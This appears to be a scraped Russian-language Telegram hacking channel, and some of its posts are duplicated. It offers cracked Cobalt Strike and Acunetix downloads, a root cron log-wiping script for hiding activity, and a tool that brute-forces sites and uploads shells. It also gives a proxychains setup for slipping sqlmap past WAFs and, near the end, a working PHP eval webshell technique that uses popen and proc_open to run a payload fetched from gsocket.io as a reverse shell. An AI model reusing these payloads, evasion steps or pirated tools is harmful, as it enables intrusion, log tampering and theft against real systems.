java -javaagent:BurpUnlimitedre.jar -agentpath:lib/libfaketime64.so -jar BurpUnlimitedre.jar"
❤1
log_cleaner.sh
1.7 KB
Чтобы безопасно использовать виртуальные сервера (вдс/впс), нужно всегда чистить логи, потому что в логах сохраняются все ваши действия и ваши айпишники, с которых вы подключаетесь по ssh или любому другому протоколу, вручную это делать долго, поэтому мы сделали скрипт 😆
Запуск:
Запуск:
echo "*/5 * * * * <path_to_script>" >> /var/spool/cron/crontabs/root
chmod +x script.sh
❤1
#pbs #autohack
Программа для автоматического парсинга, брута и заливки шеллов на сайт (старый софт, раньше продавался, насколько я знаю, уже несколько лет не поддерживается)
https://disk.yandex.ru/d/wMK6loN2qa_0WQ
пароль bravesec
Программа для автоматического парсинга, брута и заливки шеллов на сайт (старый софт, раньше продавался, насколько я знаю, уже несколько лет не поддерживается)
https://disk.yandex.ru/d/wMK6loN2qa_0WQ
пароль bravesec
Яндекс Диск
PBS.zip
Посмотреть и скачать с Яндекс Диска
image_2021-04-21_11-13-08.png
10.3 KB
#waf #proxy #config #proxychains
Лайфхак как юзать прокси для обхода ваф, когда нужно, к примеру, каждый запрос делать с другого ипа.
Лайфхак как юзать прокси для обхода ваф, когда нужно, к примеру, каждый запрос делать с другого ипа.
apt install proxychainsПосле запускаем любой скрипт через proxychains типа
nano /etc/proxychains.conf
random_chain
chain_len = 1
quiet_mode
remote_dns_subnet 224
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 93.177.***.*** 1085
заполняем кучей проксей
proxychains sqlmap.py
#script #Полезные_Штуки
https://github.com/aboul3la/Sublist3r
Скрипт для поиска поддоменов.
https://github.com/aboul3la/Sublist3r
Скрипт для поиска поддоменов.
python sublist3r.py -d domain.ru
Cobalt Strike 4.9
Download:
Download:
https://ponies.cloud/c2/CobaltStrike%204.9%20Cracked%20uCare@Pwn3rzs.7z
Password: 20231004_2218
Full Black client: https://ponies.cloud/c2/CobaltStrike%204.9%20Client%20Only%20Full%20Theme%20uCare@Pwn3rzs.7z
Password: 20231005_2033👍1
Acunetix_23.11.rar
256.7 MB
Буду иногда выкладывать тем, чем пользуюсь и писать заметки иногда, а то сохранённые сообщения уже переполнены 😆
MoElDump-master.zip
10.4 KB
Дампер написали уже пару лет назад, но всё равно иногда пользуюсь (под монгодб и эластик)
❤1
Коменты открыл и привязал чатик 😆. Мой главный вопрос, откуда вы узнали про этот канал?) я его забросил в 2023 году, неужели нужно дальше выкладывать такие штуки?
Знаю, что многие используют окунь немного неправильно, вот одна из причин (возможно кто-то не знал про это)
1. Первым делом мы должны с вами запустить Burp, залогинится в нашу цель, тыкнуть на таргеты и сохранить все запросы в xml.
2. Кормим этот файл в акунетикс
Это довольно сильно повысит ваши шансы найти уязвимости в тех сайтах, где нужна авторизация.
1. Первым делом мы должны с вами запустить Burp, залогинится в нашу цель, тыкнуть на таргеты и сохранить все запросы в xml.
2. Кормим этот файл в акунетикс
Это довольно сильно повысит ваши шансы найти уязвимости в тех сайтах, где нужна авторизация.
❤8👍2
Web Application Security Notes
#script #Полезные_Штуки https://github.com/aboul3la/Sublist3r Скрипт для поиска поддоменов. python sublist3r.py -d domain.ru
https://www.youtube.com/shorts/qn6OGt6GqHQ
В прошлый раз, я показывал как собирать поддомены и выкладывал скрипт, но это было в 2021 году... Сейчас появились инструменты получше:
Теперь мы можем увидеть не только зарегистрированные поддомены, но и те которые резолвятся, какой ответ получают, подключать куча сервисов по апишке и даже выстраивать графики.
https://github.com/screetsec/Sudomy.git
В прошлый раз, я показывал как собирать поддомены и выкладывал скрипт, но это было в 2021 году... Сейчас появились инструменты получше:
Теперь мы можем увидеть не только зарегистрированные поддомены, но и те которые резолвятся, какой ответ получают, подключать куча сервисов по апишке и даже выстраивать графики.
https://github.com/screetsec/Sudomy.git
./sudomy -d domain -dP -eP -rS -cF -pS -tO -gW --httpx -aI webanalyze -sS
GitHub
GitHub - screetsec/Sudomy: Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated…
Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting - screetsec/Sudomy
👍5❤2
История о том, как я решил пройти собеседование в двух компаниях ПТ и Грибы (facct), специализирующейся на информационной безопасности, приводит меня к размышлениям о процессе найма и работе в области пентестов веб приложений.
Первые собеседования с представителями отдела кадров прошли гладко. Обсуждались общие темы, вопросы о типах уязвимостей, клиент сайд, сервер сайд, разновидности xss и другие общие вопросы. Эти этапы были стандартными и предсказуемыми. Затем настало время технических собеседований.
Ожидания от технической части интервью были высоки, учитывая мой опыт работы в отрасли уже более пяти лет и должность на довольно высокой позиции... Начало технического интервью было обещающим, задавались типичные сценарии веб-приложений и обсуждались возможные векторы атак. Однако процесс внезапно стал затянутым и направлен на администрирование, что меня сильно удивило.
Во время интервью меня начали расспрашивать о темах, не относящихся к пентестам, таких как настройка cross-domain policy и другие административные аспекты. Это вызвало у меня недоумение, потому что я считаю, что подобные моменты можно прогуглить, ну надо тебе настроить, ну напиши в гугле и настрой, нахера мне учить это? Вопросы о работе сериализации и десериализации на различных языках также отклонились от темы пентестов. Мне показалось что им гораздо важней, чтобы я смог написать им уязвимое приложение, нежели найти уязвимости в реальных приложениях.
Итогом этого опыта стала потеря нервов и понимание того, что компания не сосредоточена на реальных пентестах, а больше на том, чтобы состряпать им очередной хакатончик, цтфочку, стэндофчик или митап. Работники больше ориентированы на тендеры в ASV сканировании похоже, чем на практическую работу с безопасностью. Видимо, они просто сидят, сканируют, потом переводят отчёт со сканера, получают деньги и всё, на эти деньги делают какие-то мероприятия. Это могло привести к недостаткам в области информационной безопасности, особенно с учетом уязвимости многих государственных приложений в последнее время.
Мой совет для тех, кто ищет работу в области информационной безопасности, - выбирайте компании, где ценится реальное практическое понимание области, а не только теоретические знания. Ищите единомышленников, увлеченных информационной безопасностью на деле, а не только на бумаге.
Первые собеседования с представителями отдела кадров прошли гладко. Обсуждались общие темы, вопросы о типах уязвимостей, клиент сайд, сервер сайд, разновидности xss и другие общие вопросы. Эти этапы были стандартными и предсказуемыми. Затем настало время технических собеседований.
Ожидания от технической части интервью были высоки, учитывая мой опыт работы в отрасли уже более пяти лет и должность на довольно высокой позиции... Начало технического интервью было обещающим, задавались типичные сценарии веб-приложений и обсуждались возможные векторы атак. Однако процесс внезапно стал затянутым и направлен на администрирование, что меня сильно удивило.
Во время интервью меня начали расспрашивать о темах, не относящихся к пентестам, таких как настройка cross-domain policy и другие административные аспекты. Это вызвало у меня недоумение, потому что я считаю, что подобные моменты можно прогуглить, ну надо тебе настроить, ну напиши в гугле и настрой, нахера мне учить это? Вопросы о работе сериализации и десериализации на различных языках также отклонились от темы пентестов. Мне показалось что им гораздо важней, чтобы я смог написать им уязвимое приложение, нежели найти уязвимости в реальных приложениях.
Итогом этого опыта стала потеря нервов и понимание того, что компания не сосредоточена на реальных пентестах, а больше на том, чтобы состряпать им очередной хакатончик, цтфочку, стэндофчик или митап. Работники больше ориентированы на тендеры в ASV сканировании похоже, чем на практическую работу с безопасностью. Видимо, они просто сидят, сканируют, потом переводят отчёт со сканера, получают деньги и всё, на эти деньги делают какие-то мероприятия. Это могло привести к недостаткам в области информационной безопасности, особенно с учетом уязвимости многих государственных приложений в последнее время.
Мой совет для тех, кто ищет работу в области информационной безопасности, - выбирайте компании, где ценится реальное практическое понимание области, а не только теоретические знания. Ищите единомышленников, увлеченных информационной безопасностью на деле, а не только на бумаге.
😁3
Если у кого-то есть хостинг серверов, которые не блочат - напишите, нексус отпал 😆
Из интересного:
Дано: веб приложение с eval($cmd); почти все пхп функции отключены (system, passthru, exec, shell_exec). evalsploit не помогает
Решение:
Получаем пхпинфо и смотрим какие функции отключены.
Далее получаем список доступных функций:
В данном веб приложении была обнаружена функция "popen", выполняем whoami
Выбираем реверс шелл, в данном случае я использовал gsocket
Профит (скрины в комменты закину)
Дано: веб приложение с eval($cmd); почти все пхп функции отключены (system, passthru, exec, shell_exec). evalsploit не помогает
Решение:
Получаем пхпинфо и смотрим какие функции отключены.
shell.php?cmd=phpinfo();
Далее получаем список доступных функций:
shell.php?cmd=print_r(get_defined_functions());
В данном веб приложении была обнаружена функция "popen", выполняем whoami
shell.php?cmd=$h=popen(%27whoami%27,%27r%27);echo%20fread($h,4096);pclose($h);
Выбираем реверс шелл, в данном случае я использовал gsocket
eval('
$cmd = file_get_contents("http://gsocket.io/y");
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);
$process = proc_open("bash -c \"$cmd\"", $descriptorspec, $pipes);
if (is_resource($process)) {
$output = stream_get_contents($pipes[1]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
echo $output;
}
');Профит (скрины в комменты закину)
❤4👍4
